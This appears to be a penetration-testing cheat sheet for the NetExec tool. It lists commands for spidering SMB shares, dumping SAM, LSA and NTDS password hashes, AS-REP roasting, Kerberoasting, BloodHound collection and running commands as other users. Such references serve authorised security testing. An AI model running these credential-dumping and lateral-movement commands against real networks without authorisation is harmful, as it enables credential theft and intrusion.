NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks. It is based on CrackMapExec, which makes the tool familiar to use.
Personally, I think the modules from NetExec make it worth to use the tool.
SMB spidering shares
Spider and export all files from shares:
Copy nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True List all readable files:
Copy nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus Dumping hashes
Dumping SAM
Copy nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam Dumping LSA
Copy nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa Dumping from NTDS.dit
Copy nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss Bloodhound
If you have creds, you can use nxc to get a zip or .json files for bloodhound
Copy nxc ldap <ip> -u user -p pass --bloodhound -ns <ns-ip> --collection All AS-REP Roasting
Only one user
Copy nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txt List including usernames
Copy nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt Kerberoasting
Copy nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt SMB logged on users
Copy nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users SMB active sessions
Copy nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions SMB Execute commands on behalf of other users
Copy nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command> 
